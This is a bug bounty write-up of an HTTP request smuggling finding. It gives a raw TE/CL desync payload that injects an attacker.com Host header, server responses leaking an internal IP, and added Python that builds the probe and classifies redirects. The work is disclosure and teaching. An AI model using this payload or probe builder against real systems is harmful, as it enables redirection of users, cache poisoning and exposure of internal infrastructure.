I reported an HTTP request smuggling vulnerability on a target platform that exposed sensitive internal IPs and allowed malicious redirection through Host header injection. Initially, the report was marked as needing more information, with the triager requesting real-world impact examples, like stored XSS or header exfiltration, to demonstrate the exploit's relevance. Through detailed follow-up and evidence, I demonstrated how this could lead to malicious redirection and internal IP exposure, leading to a confirmed, impactful report.
Timeline
Initial Report: Submitted with a PoC showing internal IP exposure and Host header injection leading to redirection.
Response: Triager marked the report as Needs More Info, questioning its real-world impact.
Follow-up: Clarified the exploit's potential for redirecting users and exposing sensitive backend information.
Resolution: After additional review, the vulnerability was triaged and confirmed for remediation.
Technical Details
While testing the target’s request handling, I found inconsistencies between Transfer-Encoding and Content-Length headers, indicating potential for HTTP request smuggling.
PoC Payload:
GET /path/singup/r?OopAmfaC=test HTTP/1.1
Host: targetsite.com
Connection: keep-alive
Transfer-Encoding: chunked
Content-Length: 0

GET /icons HTTP/1.0
Connection: Keep-Alive

POST /icons HTTP/1.0
Host: attacker.com
Content-Length: 0
This crafted payload targets the parsing difference between the two hops: the front end honours Transfer-Encoding: chunked and forwards everything as a single request, while the back end honours Content-Length: 0 and treats the trailing bytes as further requests. The smuggled POST therefore reaches the back end with an attacker-controlled Host header that the front end's checks never saw.
Response:
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 19 Oct 2024 10:55:05 GMT
Content-Type: text/html
Content-Length: 162
Location: https://10.8.154.59/icons/
Connection: keep-alive
Set-Cookie: BIGipServer~Internal~pool-CORP_MYDASHAGH-EXT.TARGET.COM-443=999950346.47873.0000; path=/; Httponly; Secure

<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 19 Oct 2024 10:55:05 GMT
Content-Type: text/html
Content-Length: 162
Location: https://attacker.com/icons/
Connection: close

<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>
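To make the probe and its triage reproducible, here is an added example (written for this page, not the author's tooling) that builds the payload above as raw bytes, splits a concatenated response stream on Content-Length the way the two back-to-back 301s arrive, and labels each Location that points at a private IP or at a host other than the one sent. The hostnames and the sample response bytes are constructed from the write-up, not captured traffic; feed the bytes returned by a TLS socket into analyze() to check a real target you are authorised to test.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample values; the real target is redacted in the write-up.
FRONT_HOST = "targetsite.com"
ATTACKER_HOST = "attacker.com"


def build_probe(front_host: str, smuggled_host: str, path: str = "/icons") -> bytes:
    """Raw bytes of the TE/CL probe: the lead request carries both
    Transfer-Encoding: chunked and Content-Length: 0, so a front end that
    honours TE forwards everything while a back end that honours CL parses
    the remainder as two more requests, the second with our Host header."""
    lead = (
        "GET /path/singup/r?OopAmfaC=test HTTP/1.1\r\n"
        f"Host: {front_host}\r\n"
        "Connection: keep-alive\r\n"
        "Transfer-Encoding: chunked\r\n"
        "Content-Length: 0\r\n\r\n"
    )
    smuggled = (
        f"GET {path} HTTP/1.0\r\nConnection: Keep-Alive\r\n\r\n"
        f"POST {path} HTTP/1.0\r\nHost: {smuggled_host}\r\nContent-Length: 0\r\n\r\n"
    )
    return (lead + smuggled).encode("ascii")


def split_responses(stream: bytes) -> list:
    """Split one byte stream into HTTP responses, framing each body by its
    Content-Length (nginx sets it explicitly on these redirects)."""
    responses = []
    pos = 0
    while True:
        end = stream.find(b"\r\n\r\n", pos)
        if end == -1:
            break  # no further complete header block
        status, *header_lines = stream[pos:end].decode("iso-8859-1").split("\r\n")
        headers = {}
        for line in header_lines:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = end + 4
        body_len = int(headers.get("content-length", "0"))
        responses.append({"status": status, "headers": headers,
                          "body": stream[body_start:body_start + body_len]})
        pos = body_start + body_len
    return responses


def classify_location(location: str, expected_host: str) -> str:
    """Label a Location header: private/internal IP, a host we did not send, or ok."""
    host = urlsplit(location).hostname or ""
    try:
        if ipaddress.ip_address(host).is_private:
            return "internal-ip-disclosure"
    except ValueError:
        pass  # not an IP literal, compare as a hostname below
    if host.lower() != expected_host.lower():
        return "host-injection"
    return "ok"


def analyze(stream: bytes, expected_host: str) -> list:
    """(status line, Location, verdict) for every response in the stream."""
    findings = []
    for resp in split_responses(stream):
        location = resp["headers"].get("location", "")
        verdict = classify_location(location, expected_host) if location else "ok"
        findings.append((resp["status"], location, verdict))
    return findings


def _nginx_301(location: str, connection: str) -> bytes:
    """Constructed copy of the redirect shown in the write-up (not captured traffic)."""
    body = (b"<html>\r\n<head><title>301 Moved Permanently</title></head>\r\n<body>\r\n"
            b"<center><h1>301 Moved Permanently</h1></center>\r\n"
            b"<hr><center>nginx</center>\r\n</body>\r\n</html>\r\n")
    head = ("HTTP/1.1 301 Moved Permanently\r\nServer: nginx\r\n"
            "Date: Sat, 19 Oct 2024 10:55:05 GMT\r\nContent-Type: text/html\r\n"
            f"Content-Length: {len(body)}\r\nLocation: {location}\r\n"
            f"Connection: {connection}\r\n\r\n").encode("ascii")
    return head + body


# Two responses back to back, as the write-up shows them arriving.
SAMPLE_STREAM = (_nginx_301("https://10.8.154.59/icons/", "keep-alive")
                 + _nginx_301("https://attacker.com/icons/", "close"))


if __name__ == "__main__":
    for status, location, verdict in analyze(SAMPLE_STREAM, FRONT_HOST):
        print(f"{verdict:24} {status} -> {location}")
```

The private-IP check is what turns a bare redirect into the "internal IP exposure" finding: a 301 to 10.8.154.59 means the back end is assembling Location from its own view of the host, and the second verdict shows the same code path honouring whatever Host the smuggled request supplied.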
Initial Feedback from Triager
The triager requested more evidence of real-world impact, specifically questioning how this exploit could affect other users. Suggested scenarios included redirecting victims, obtaining stored XSS, or exfiltrating headers via crafted POST requests.
The triager commented:
“Unfortunately, the provided PoC doesn’t demonstrate real-world impact. To validate the desync/smuggling attack, please provide an attack vector against other users.”